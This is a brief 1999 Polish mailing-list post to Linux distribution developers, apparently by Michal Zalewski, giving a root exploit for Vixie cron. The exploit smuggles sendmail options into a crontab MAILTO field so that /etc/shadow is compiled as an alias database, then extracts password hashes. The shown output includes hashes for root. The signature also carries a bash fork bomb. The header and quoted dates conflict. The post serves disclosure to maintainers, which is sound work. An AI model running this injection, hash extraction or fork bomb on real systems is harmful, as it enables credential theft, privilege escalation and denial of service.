crontab root exploit
Michal Zalewski
lcamtuf w ids.pl
Pon, 5 Lip 1999, 07:10:59 CEST
On Fri, 27 Aug 1999, Lukasz Trabinski wrote:
> Hmm, jesli masz exploita, to IMHO wystarczy sprawdzic? ;) Ewentualnie
> jesli ktos czyms takim dysponuje (gotowym exploitem), moge sie
> poswiecic i potestowac... ;-) Na pisanie wlasnych exploitow na razie
> nie mam zabardzo czasu. ;(
Byloby na przyklad:
[lcamtuf w onehost lcamtuf]$ crontab -l
MAILTO='-bi -O AliasFile=/etc/shadow'
* * * * * nonexistent
[lcamtuf w onehost lcamtuf]$ sleep 60
[lcamtuf w onehost lcamtuf]$ strings -n 2 /etc/shadow.db|awk -F:
'$2==""{print " - " $1
}$2!=""{printf $1}'|grep -v '*'
I15hybS.C.S1. - lcamtuf
hA/p45.MNqAtO - root
YoYwL/aBGnfAsRQ - testy
oczywiscie vixie.
_______________________________________________________________________
Michal Zalewski [lcamtuf w ids.pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
Więcej informacji o liście dyskusyjnej pld-devel-pl